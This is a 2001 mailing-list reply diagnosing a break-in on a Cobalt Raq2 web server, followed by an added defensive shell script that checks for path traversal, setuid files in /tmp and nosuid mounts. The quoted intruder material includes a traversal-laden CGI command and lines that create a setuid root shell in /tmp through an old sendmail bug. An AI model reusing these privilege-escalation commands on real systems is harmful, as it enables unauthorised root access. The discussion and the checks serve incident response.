Re: [cobalt-users] Raq2 Hack
- Subject: Re: [cobalt-users] Raq2 Hack
- From: flash22@xxxxxxx
- Date: Sun Aug 19 03:57:10 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
On Sun, 19 Aug 2001, Hacked Raq2 wrote:
> Hello all,
>
> Well, it seems that I've had an intruder on my Raq2. What I'm trying to
> figure out, is how he got in. I have all the important patches applied and
> Here's the processes that were running. It appears he only had the
> privileges of HTTPD:
>
> httpd 19108 0.0 0.6 3012 864 ? S NAug 17 0:00 sh -c
> /home/sites/site19/cgi-bin/Mall/../../../../../../../../../../../../../../..
> /../../../../../../../../../
I'd place a bet on that one, looks typical of an exploit to compromise a
cgi with some quoting hole in it....
> I also see that he had some kind of IRC program running.
typical, gotta brag about the exploits to all the other clueless...
>
> Here are the contents of the shell.pl that he had in /tmp:
Just opens a telnet port...
> Here are a list of the files he put into /tmp:
>
> echo "[icesk] createing suid shellscript"
> echo <<EOF > /tmp/suid.sh
> #!/bin/sh
> cp /bin/sh /tmp/sh;chmod +s /tmp/sh
Hmm, this isn't supposed to work on Raq2s anymore, one of the updates was
supposed to remove the sticky bit from /tmp
> ./sendmail 127.0.0.1 /tmp/suid.sh
Old bug in sendmail...makes it try to 'fix' owner/permissions on the
file...
> echo "[icesk] allow 10 minutes for mail to cycle then run /tmp/sh"
which maybe now has higher perms and g+s
gsh
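The three things this reply calls out (a CGI invoked with a long `../` chain, a setuid copy of `/bin/sh` dropped in `/tmp`, and whether `/tmp` is actually mounted so that setuid bits are ignored) can each be checked from a shell on the box. The script below is an added example written for this page, not code from the thread or from Cobalt; the threshold of four `../` segments, the function names, and the sample `ps` and mounts lines it is tested against are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original thread): defender-side checks for the
# traversal, setuid-in-/tmp and nosuid points raised in the reply above.

# Count the "../" segments in one line of ps output or an access log.
# The quoted ps line in the thread shows dozens of them after cgi-bin/Mall/.
traversal_depth() {
    # $1: the line to inspect; prints an integer count
    printf '%s\n' "$1" | grep -o '\.\./' | wc -l | tr -d ' '
}

# Return 0 (true) when a line carries at least TRAVERSAL_THRESHOLD "../"
# segments. Four is an assumed cut-off; a legitimate CGI rarely needs more.
is_suspicious_path() {
    depth=$(traversal_depth "$1")
    [ "$depth" -ge "${TRAVERSAL_THRESHOLD:-4}" ]
}

# Scan a running process list for suspicious command lines and print them.
# Uses ps from the local system; nothing printed means nothing matched.
scan_process_list() {
    ps axww 2>/dev/null | while IFS= read -r line; do
        if is_suspicious_path "$line"; then
            printf 'SUSPICIOUS: %s\n' "$line"
        fi
    done
}

# List setuid or setgid regular files below a directory (typically /tmp).
# The intruder's suid.sh relies on exactly such a file surviving there.
list_suid() {
    # $1: directory to scan; -xdev keeps the walk on one filesystem
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Return 0 when the mount point in $1 is listed with the nosuid option in a
# mounts table ($2, default /proc/mounts). With nosuid set, a setuid /tmp/sh
# gives no extra privilege even if the copy and chmod succeed.
is_nosuid() {
    mp=$1
    table=${2:-/proc/mounts}
    awk -v mp="$mp" '
        $2 == mp && $4 ~ /(^|,)nosuid(,|$)/ { found = 1 }
        END { exit (found ? 0 : 1) }
    ' "$table"
}

# Report on the local machine when run directly.
run_report() {
    echo "== processes with deep ../ chains =="
    scan_process_list
    echo "== setuid/setgid files under /tmp =="
    list_suid /tmp
    if is_nosuid /tmp; then
        echo "/tmp is mounted nosuid"
    else
        echo "/tmp is NOT mounted nosuid (or is not a separate mount)"
    fi
}

# Only run the report when executed, not when sourced for the checks.
case "$0" in
    *suid_check*) run_report ;;
esac
```

`is_nosuid` reads `/proc/mounts`, so it only answers for Linux hosts where `/tmp` is its own mount; on a Raq2 where `/tmp` sits on the root filesystem the right mitigation is the one the reply alludes to, stripping setuid bits from anything found by `list_suid` and keeping the web server from writing there at all.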